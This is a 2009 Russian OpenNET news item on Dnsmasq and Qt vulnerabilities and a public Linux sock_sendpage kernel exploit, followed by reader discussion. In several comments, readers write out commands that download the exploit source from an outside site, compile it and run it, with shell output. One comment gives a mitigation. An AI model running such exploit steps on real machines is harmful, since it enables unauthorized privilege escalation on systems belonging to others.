The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

01.09.2009 18:18  Уязвимости в Dnsmasq и Qt. Эксплоит для sock_sendpage-уязвимости Linux ядра

В пакете Dnsmasq, объединяющем в себе кэширующий DNS прокси и DHCP сервер, обнаружено две уязвимости, позволяющие удаленному злоумышленнику добиться выполнения своего кода. Для проявления уязвимости Dnsmasq должен быть запущен с поддержкой TFTP-сервиса, которая по умолчанию не используется в сборке Dnsmasq из состава дистрибутивов OpenWRT и DD-WRT, на которых построено множество различных точек доступа и небольших маршрутизаторов. Уязвимости устранены в версии dnsmasq 2.50.

Компания Nokia объявила о выпуске набора патчей исправлением проблем безопасности в библиотеке Qt версии 4.3.0 и выше. Проблема связана с ошибкой в реализации класса QSslCertificate и приводит к некорректному парсингу SAN (Subject Alternate Names) полей в сертификатах X.509, когда в этих полях содержатся символы с нулевым кодом.

Кроме того, представлен универсальный эксплоит для обнаруженной в начале августа уязвимости во всех версиях Linux ядра из диапазона 2.4.0-2.4.37.4 и 2.6.0-2.6.30.4. Эксплоит проверен на дистрибутивах CentOS 5.3/4.8, RHEL 5.3/4.8, SUSE 11/10-SP2 и Ubuntu 8.10 в сборках для платформ i386 и x86_64. Опасность представляет то, что Red Hat, Ubuntu, Novell и CentOS выпустили обновления ядра с исправлением данной уязвимости с большим опозданием, только на прошлой неделе.

  1. Главная ссылка к новости (http://www.coresecurity.com/co...)
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: security
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Линейный вид | Ajax | Показать все | RSS
 
  • 1.1, vitek, 21:36, 01/09/2009 [ответить] [смотреть все]
  • +/
    у меня из реп обновились кеды до версии 4.3.1
    но нигде ни слова об этом.
    может с этими дырками связано...
     
  • 1.2, alex, 22:59, 01/09/2009 [ответить] [смотреть все]
  • +/
    Ну нет слов. Linux - это конечно хорошо, но неужели господа девелоперы не могут ужесточить проверки в разработки ядра и все такое. Блин, просто нет слов. :-(
     
     
  • 2.3, User294, 23:22, 01/09/2009 [^] [ответить] [смотреть все]
  • +/
    Кутя как бы не только на линухе есть. Да и dnsmasq тоже. А ядро пропатченное уже приехало...
     
     
  • 3.5, Анонимусс, 01:21, 02/09/2009 [^] [ответить] [смотреть все]
  • +/
    Нет, просто вопрос во времени жизни этой уязвимости. Во всяких нуль-дей она могла лежать несколько лет и машины можно было хачить просто на раз. Жесть. Хоть я и являюсь несколько лет пользователем, контрибъютером линукса и все-такое, но честно, вот в таких случаях хочется ругаться самыми некрасивыми словами. Это же действительно ж@па.
     
  • 3.9, Maxim Chirkov, 11:00, 02/09/2009 [^] [ответить] [смотреть все]
  • +1 +/
    Паранойя подсказывает мне, что опасность приближается со стороны автоматических ... весь текст скрыт [показать]
     
     
  • 4.12, User294, 14:11, 02/09/2009 [^] [ответить] [смотреть все]  
  • +/
    В общем то логично, ибо удобный канал для массового заражения Но дело в том что... весь текст скрыт [показать]
     
     
  • 5.14, Антон, 14:56, 02/09/2009 [^] [ответить] [смотреть все]  
  • +/
    >А подписать пакеты правильным ключом? А вот к таковым

    Проще простого, собирают материал про какого-нибудь разработчика бывшего хиппи балующегося "травкой", приезжает дядька в погонах и говорит  "будем заводить дело или как ?" Все, ключ в кармане, если вскроется - гнусные хакеры взломали сервер.  А то и утюг поможет. Зачем взламывать когда есть человеческий фактор и социальная инженерия ?

     
     
  • 6.15, pavlinux, 15:38, 02/09/2009 [^] [ответить] [смотреть все]  
  • +1 +/
    Что б утюг ставить, надо знать с какой целью 1 Явная цель - известна жертва, ... весь текст скрыт [показать]
     
  • 6.17, User294, 00:47, 03/09/2009 [^] [ответить] [смотреть все]  
  • +/
    >Проще простого, собирают материал про какого-нибудь разработчика бывшего хиппи
    >балующегося "травкой",

    И чего? Остальные будут на это все смотреть? Да они вой на полинтернета поднимут. Оно кому-то надо?

    >Все, ключ в кармане, если вскроется - гнусные хакеры взломали сервер.

    Попробуйте угадать через сколько это вскроется и какой резонанс вызовет? :).Какой-то почти научно фантастический сценарий. В дебияноподобных к тому же паливный и неудобный, потому что есть сорцы из которых делается пакет и все диффы как на ладони. Втихаря подпихнуть что-то в такой схеме и длительно оставаться незамеченным довольно проблематично. Например кто-то зафетчит сорцы и просечет несоответствие сорца бинарям или же левак в сорце (если там тоже бэкдор есть). И?

     
  • 5.16, Maxim Chirkov, 21:31, 02/09/2009 [^] [ответить] [смотреть все]  
  • +/
    То-то в прошлом году Fedora и Red Hat ключи меняли - Если утащили SSH-ключ, то... весь текст скрыт [показать]
     
     
  • 6.18, User294, 13:56, 03/09/2009 [^] [ответить] [смотреть все]  
  • +/
    Вообще - в теории возможно возможно все На практике некоторые вещи труднореализ... весь текст скрыт [показать]
     
  • 1.4, pavlinux, 23:24, 01/09/2009 [ответить] [смотреть все]  
  • +/
    pavel@amd64:/> mkdir /tmp/EXPLOIT && cd /tmp/EXPLOIT
    pavel@amd64:/tmp/EXPLOIT>  wget -с http://www.risesecurity.org/exploits/linux-sendpage.c
    pavel@amd64:/tmp/EXPLOIT> gcc linux-sendpage.c -o linux-sendpage
    pavel@amd64:/tmp/EXPLOIT> ./linux-sendpage
    mmap: Permission denied

    :( Ниработат

     
     
  • 2.7, Руслан, 07:04, 02/09/2009 [^] [ответить] [смотреть все]  
  • +/
    попробуй так:
    gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
     
  • 2.8, Руслан, 07:12, 02/09/2009 [^] [ответить] [смотреть все]  
  • +/
    rus@home:/tmp/EXPLOIT$ ./linux-sendpage
    sh-3.2$ mkdir /root/123
    mkdir: невозможно создать каталог '/root/123': Отказано в доступе
    sh-3.2$ id
    uid=1000(rus) gid=1000(rus) группы=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),110(netdev),116(powerdev),117(fuse),1000(rus)

    И что с этим делать могут?

     
  • 1.6, Аноним, 02:10, 02/09/2009 [ответить] [смотреть все]  
  • +/
    А у меня на Debian Stable почему-то работает В Debian до сих пор не обновили ... весь текст скрыт [показать]
     
     
  • 2.10, vitek, 11:02, 02/09/2009 [^] [ответить] [смотреть все]  
  • +/
    >А у меня на Debian Stable почему-то работает :( В Debian до сих пор не обновили ядро?

    обсуждали ж уже - https://www.opennet.ru/opennews/art.shtml?num=23014
    обираешь пульсаудио и sudo sysctl vm.mmap_min_addr=65536 (штоб не 0 было)

     
     
  • 3.11, Аноним, 13:04, 02/09/2009 [^] [ответить] [смотреть все]  
  • +/
    Этот универсальный эксплоит теперь умеет ломиться не только через пульсаудио, но... весь текст скрыт [показать]
     
     
  • 4.13, vitek, 14:17, 02/09/2009 [^] [ответить] [смотреть все]  
  • +/
    >Этот универсальный эксплоит теперь умеет ломиться не только через пульсаудио, но и через bluetooth инфраструктуру :) Но смысл не в этом, латать багу в ядре будут или нет?

    вот даже и не знаю! :-D
    у меня сей универсальный продукт выдаёт:
    mmap: Permission denied
    ведро от 16 августа. что обсуждаем сейчас, в сентябре - не понятно.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2017 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor